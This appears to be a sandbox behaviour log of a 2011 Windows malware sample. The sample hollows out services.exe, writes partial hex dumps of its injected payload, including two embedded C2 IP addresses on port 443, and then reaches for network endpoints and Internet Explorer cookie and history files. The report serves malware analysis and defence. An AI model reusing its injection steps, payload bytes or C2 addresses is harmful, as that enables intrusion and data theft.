    Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 850000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 436141133
    Section loaded Path: C:\WINDOWS\system32\services.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 850000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 470841015
    Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 860000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 470842325
    Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 870000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 470844361
    Section loaded Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 470845898
    Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 870000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 470848033
    Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 470853116
    Section loaded Path: C:\WINDOWS\system32\services.exe Access: write and read and execute Type: commit Baseaddress: 9A0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 470854851
    Section loaded Path: C:\WINDOWS\system32\services.exe Access: query and read Type: commit Baseaddress: 9A0000 Size: 110592 Protection: readonly Mapped to pid: own pid success or wait 470857410
    Section loaded Path: C:\WINDOWS\system32\services.exe Access: write and read and execute Type: commit Baseaddress: 9A0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 470859317
    Section loaded Path: C:\WINDOWS\system32\services.exe Access: query and read Type: commit Baseaddress: 9A0000 Size: 110592 Protection: readonly Mapped to pid: own pid success or wait 470860159
    Section loaded Path: C:\WINDOWS\system32\services.exe Access: query and read Type: commit Baseaddress: 870000 Size: 110592 Protection: readonly Mapped to pid: own pid success or wait 470871786
    Process created PID: 388 Path: C:\WINDOWS\system32\services.exe Cmdline: services.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Createflags: 0 success or wait 470873449
    Memory allocated PID: 1568 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S Base: 880000 Length: 12FAA0 Allocation Type: null Protection: page read and write success or wait 471135549
    Memory read PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 7FFDD008 Length: 4 Value: 00 00 00 01 success or wait 471135708
    Memory allocated PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 400000 Length: 12FAB8 Allocation Type: null Protection: page execute and read and write success or wait 471135806
    Memory written PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 400000 Length: 1024 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 38 A7 1C 4C 7C C6 72 1F 7C C6 72 1F 7C C6 72 1F FF CE 2F 1F 72 C6 72 1F FF DA 7C 1F 7F C6 72 1F 13 D9 78 1F 77 C6 72 1F 13 D9 76 1F 7E C6 72 1F 7C C6 73 1F 15 C6 72 1F 4A E0 76 1F 7F C6 72 1F 4A E0 79 1F 79 C6 72 1F 52 69 63 68 7C C6 72 1F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 E2 62 DC 4D 00 00 00 00 00 00 00 00 E0 00 0F success or wait 471159539
    Memory written PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 401000 Length: 7168 Value: E8 05 00 00 00 E9 0A 00 00 00 B9 A0 43 40 00 E9 AA 16 00 00 68 20 10 40 00 E8 3E 17 00 00 59 C3 B9 A0 43 40 00 E9 9A 16 00 00 E8 05 00 00 00 E9 0A 00 00 00 B9 98 43 40 00 E9 80 16 00 00 68 4A 10 40 00 E8 14 17 00 00 59 C3 B9 98 43 40 00 E9 70 16 00 00 E8 05 00 00 00 E9 0A 00 00 00 B9 94 43 40 00 E9 56 16 00 00 68 74 10 40 00 E8 EA 16 00 00 59 C3 B9 94 43 40 00 E9 46 16 00 00 E8 05 00 00 00 E9 0A 00 00 00 B9 90 43 40 00 E9 2C 16 00 00 68 9E 10 40 00 E8 C0 16 00 00 59 C3 B9 90 43 40 00 E9 1C 16 00 00 E8 05 00 00 00 E9 0A 00 00 00 B9 88 43 40 00 E9 02 16 00 00 68 C8 10 40 00 E8 96 16 00 00 59 C3 B9 88 43 40 00 E9 F2 15 00 00 55 8B EC B8 14 13 00 00 E8 91 16 00 00 53 56 57 33 DB B9 FF 03 00 00 33 C0 8D BD ED EC FF FF 88 9D EC EC FF FF F3 AB 66 AB AA 6A 40 33 success or wait 471186977
    Memory written PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 403000 Length: 2560 Value: 32 38 00 00 48 38 00 00 1C 38 00 00 00 00 00 00 B8 36 00 00 CE 36 00 00 D8 36 00 00 E4 36 00 00 F2 36 00 00 FE 36 00 00 0C 37 00 00 18 37 00 00 34 37 00 00 40 37 00 00 4C 37 00 00 58 37 00 00 6C 37 00 00 7C 37 00 00 88 37 00 00 9A 37 00 00 A8 37 00 00 BE 37 00 00 D0 37 00 00 E4 37 00 00 C6 36 00 00 00 00 00 00 F1 18 00 80 99 02 00 80 6C 10 00 80 DA 1A 00 80 AC 03 00 80 19 02 00 80 5A 03 00 80 17 02 00 80 02 0B 00 80 5C 03 00 80 62 01 00 80 1C 02 00 80 42 14 00 80 F6 0C 00 80 BB 07 00 80 37 03 00 80 42 15 00 80 20 03 00 80 39 03 00 80 00 00 00 00 36 36 00 00 42 36 00 00 56 36 00 00 66 36 00 00 76 36 00 00 84 36 00 00 96 36 00 00 AA 36 00 00 26 36 00 00 1C 36 00 00 14 36 00 00 06 36 00 00 FE 35 00 00 E8 35 00 00 DA 35 00 00 D2 35 00 00 C8 35 00 00 BE 35 00 success or wait 471211536
    Memory written PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 404000 Length: 1024 Value: 00 00 00 00 00 10 40 00 2A 10 40 00 54 10 40 00 7E 10 40 00 A8 10 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 39 2E 31 2E 32 33 2E 37 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 BB 01 00 00 00 00 00 00 00 00 00 00 36 35 2E 38 37 2E 31 39 39 2E 31 30 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 BB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 471242696
    Memory written PID: 388 Path: C:\WINDOWS\system32\services.exe Base: 7FFDD008 Length: 4 Value: 00 00 40 00 success or wait 471273831
    Thread context set TID: 584 PID: 388 DR0: 0 DR1: 0 DR2: 0 DR3: 0 DR7: 0 EIP: 7C810705 EFLAGS: 200 Imagepath: null success or wait 471297483
    Thread resumed TID: 584 PID: 388 Path: C:\WINDOWS\system32\services.exe success or wait 471297621
    Process terminated PID: 1568 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S success or wait 471300492
    Analysis File: services.exe PID: 388 Parent PID: 1568
    + Sections
    + General
    Start time: 04:13:17
    Start date: 13/12/2011
    Path: C:\WINDOWS\system32\services.exe
    Commandline: services.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\S
    Imagebase: 0x1000000
    File size: 110592 bytes
    MD5 hash: 65DF52F5B8B6E9BBD183505225C37315
    File Activities:
    + File opened
    File Path Access Options Content overwritten Completion Count Source Address
    c:\autoexec.bat read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 401F92
    \Device\Afd\Endpoint synchronize and generic read and generic write no options true success or wait 2 401F92
    \Device\Afd\AsyncConnectHlp synchronize and generic read and generic write no options true success or wait 1 401F92
    Section Activities:
    + Section loaded by Windows
    File Path Access Type Base Size Mapped to pid Protection Completion Count
    \KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
    unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
    \NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
    \NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
    \NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
    \NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
    \NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
    \KnownDlls\MFC42.DLL write and read and execute unknown 270000 24576 own pid readonly object name not found 1
    C:\WINDOWS\system32\mfc42.dll query and write and read and execute image 73DD0000 987136 own pid read write success or wait 1
    \KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
    \KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
    \KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
    \KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
    \KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
    \KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
    \KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1
    \KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
    \KnownDlls\Normaliz.dll write and read and execute unknown 280000 36864 own pid read write conflicting addresses 1
    \KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1
    \KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
    \KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
    \KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
    \KnownDlls\WS2_32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1
    C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
    \KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1
    C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
    \KnownDlls\iphlpapi.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1
    C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1
    \KnownDlls\ShimEng.dll write and read and execute unknown 76D60000 102400 own pid read write object name not found 1
    C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
    C:\WINDOWS\AppPatch\sysmain.sdb read commit 290000 1208320 own pid readonly success or wait 1
    C:\WINDOWS\AppPatch\acadproc.dll write and read and execute commit 3D0000 40960 own pid execute success or wait 1
    C:\WINDOWS\AppPatch\acadproc.dll write and read and execute commit 3D0000 40960 own pid execute success or wait 1
    C:\WINDOWS\AppPatch\acadproc.dll query and write and read and execute image 47260000 61440 own pid read write success or wait 1
    \NLS\NlsSectionCType read unknown 3E0000 12288 own pid readonly success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
    C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 8E0000 1056768 own pid execute success or wait 1
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
    C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 390000 4096 own pid execute success or wait 1
    C:\WINDOWS\WindowsShell.Manifest query and read commit 390000 4096 own pid readonly success or wait 1
    C:\WINDOWS\WindowsShell.Manifest read commit 390000 4096 own pid readonly success or wait 1
    \KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
    C:\WINDOWS\system32\shell32.dll read commit 1020000 8462336 own pid readonly success or wait 1
    \KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
    C:\WINDOWS\system32\comctl32.dll read commit AF0000 618496 own pid readonly success or wait 1
    \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768 write unknown AF0000 32768 own pid read write success or wait 1
    \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Cookies_index.dat_16384 write unknown B00000 16384 own pid read write success or wait 1
    \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 write unknown B10000 32768 own pid read write success or wait 1
    \KnownDlls\RASAPI32.dll write and read and execute unknown B10000 32768 own pid read write object name not found 1
    C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
    \KnownDlls\rasman.dll write and read and execute unknown 76EE0000 245760 own pid read write object name not found 1
    C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
    \KnownDlls\NETAPI32.dll write and read and execute unknown 76E90000 73728 own pid read write object name not found 1
    C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
    \KnownDlls\TAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write object name not found 1
    C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
    \KnownDlls\rtutils.dll write and read and execute unknown 76EB0000 192512 own pid read write object name not found 1
    C:\WINDOWS\system32\rtutils.dll query and write and read and execute image 76E80000 57344 own pid read write success or wait 1
    \KnownDlls\WINMM.dll write and read and execute unknown 76E80000 57344 own pid read write object name not found 1
    C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
    C:\WINDOWS\system32\tapi32.dll read commit B20000 184320 own pid readonly success or wait 1
    \KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
    \KnownDlls\sensapi.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
    C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
    \BaseNamedObjects\SENS Information Cache read unknown B20000 4096 own pid readonly success or wait 1
    C:\WINDOWS\system32\mswsock.dll write and read and execute commit DA0000 245760 own pid execute success or wait 1
    C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
    \KnownDlls\rasadhlp.dll write and read and execute unknown 71A50000 258048 own pid read write object name not found 1
    C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
    \KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
    \BaseNamedObjects\Local\UrlZonesSM_Administrator query and write and read commit 77C00000 32768 own pid read write object name exists 1
    \KnownDlls\hnetcfg.dll write and read and execute unknown 77C00000 32768 own pid read write object name not found 1
    C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
    C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit B80000 20480 own pid execute success or wait 1
    C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
    \KnownDlls\msapsspc.dll write and read and execute unknown 71A90000 32768 own pid read write object name not found 1
    C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
    \KnownDlls\MSVCRT40.dll write and read and execute unknown 71E50000 86016 own pid read write object name not found 1
    C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
    \KnownDlls\schannel.dll write and read and execute unknown 78080000 69632 own pid read write object name not found 1
    C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
    \KnownDlls\CRYPT32.dll write and read and execute unknown 767F0000 163840 own pid read write object name not found 1
    C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
    \KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1
    C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
    \KnownDlls\digest.dll write and read and execute unknown 77B20000 73728 own pid read write object name not found 1
    C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
    \KnownDlls\msnsspc.dll write and read and execute unknown 75B00000 86016 own pid read write object name not found 1
    C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
    \KnownDlls\MSVCRT40.dll write and read and execute unknown 747B0000 290816 own pid read write object name not found 1
    C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
    C:\WINDOWS\system32\msv1_0.dll write and read and execute commit EA0000 139264 own pid execute success or wait 1
    C:\WINDOWS\system32\msv1_0.dll query and write and read and execute image 77C70000 151552 own pid read write success or wait 1
    \KnownDlls\cryptdll.dll write and read and execute unknown 77C70000 151552 own pid read write object name not found 1
    C:\WINDOWS\system32\cryptdll.dll query and write and read and execute image 76790000 49152 own pid read write success or wait 1
    Section loaded by program
    File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
    Thread Activities:
    + Thread delayed
    TID Delay Completion Count Source Address
    1412 1s success or wait 1 401387
    1412 180s no status 0 4016C3
    + Chronological sections
    Operation Data Completion Time
    Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 471330918
    Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 471342124
    Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 471346316
    Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 471349217
    Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 471353933
    Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 471354479
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 471357952
    Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 471358089
    Section loaded Path: \KnownDlls\MFC42.DLL Access: write and read and execute Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 471361874
    Section loaded Path: C:\WINDOWS\system32\mfc42.dll Access: query and write and read and execute Type: image Baseaddress: 73DD0000 Size: 987136 Protection: read write Mapped to pid: own pid success or wait 471367427
    Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 471382585
    Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 471392260
    Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 471402388
    Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 471438939
    Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 471453602
    Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 471460806
    Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 471482748
    Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 471499584
    Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 280000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 471542599
    Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 471571324
    Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 471625645
    Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 471732901
    Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 471895225
    Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 472044356
    Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 472088646
    Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 472182968
    Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 472197569
    Section loaded Path: \KnownDlls\iphlpapi.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 472229742
    Section loaded Path: C:\WINDOWS\system32\iphlpapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D60000 Size: 102400 Protection: read write Mapped to pid: own pid success or wait 472244854
    Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 76D60000 Size: 102400 Protection: read write Mapped to pid: own pid object name not found 472278883
    Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 472280117
    Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 290000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 472285398
    Section loaded Path: C:\WINDOWS\AppPatch\acadproc.dll Access: write and read and execute Type: commit Baseaddress: 3D0000 Size: 40960 Protection: execute Mapped to pid: own pid success or wait 472298134
    Section loaded Path: C:\WINDOWS\AppPatch\acadproc.dll Access: write and read and execute Type: commit Baseaddress: 3D0000 Size: 40960 Protection: execute Mapped to pid: own pid success or wait 472301057
    Section loaded Path: C:\WINDOWS\AppPatch\acadproc.dll Access: query and write and read and execute Type: image Baseaddress: 47260000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 472302302
    Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 3E0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 472351436
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 360000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 472384245
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 360000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 472386146
    Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 472386932
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8E0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 472469272
    Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 472470227
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 390000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 472480341
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 472481416
    Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 472483361
    Thread delayed Time: 1 TID: 1412 success or wait 472613169
    Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 476371457
    Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1020000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 476376330
    Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 476391050
    Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: AF0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 476395734
    Section loaded Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768 Access: write Type: unknown Baseaddress: AF0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 476413380
    Section loaded Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Cookies_index.dat_16384 Access: write Type: unknown Baseaddress: B00000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 476416468
    Section loaded Path: \BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 Access: write Type: unknown Baseaddress: B10000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 476419090
    Section loaded Path: \KnownDlls\RASAPI32.dll Access: write and read and execute Type: unknown Baseaddress: B10000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 476463873
    Section loaded Path: C:\WINDOWS\system32\rasapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid success or wait 476464510
    Section loaded Path: \KnownDlls\rasman.dll Access: write and read and execute Type: unknown Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid object name not found 476467131
    Section loaded Path: C:\WINDOWS\system32\rasman.dll Access: query and write and read and execute Type: image Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 476467785
    Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 476469860
    Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 476470457
    Section loaded Path: \KnownDlls\TAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid object name not found 476474036
    Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid success or wait 476474605
    Section loaded Path: \KnownDlls\rtutils.dll Access: write and read and execute Type: unknown Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid object name not found 476477285
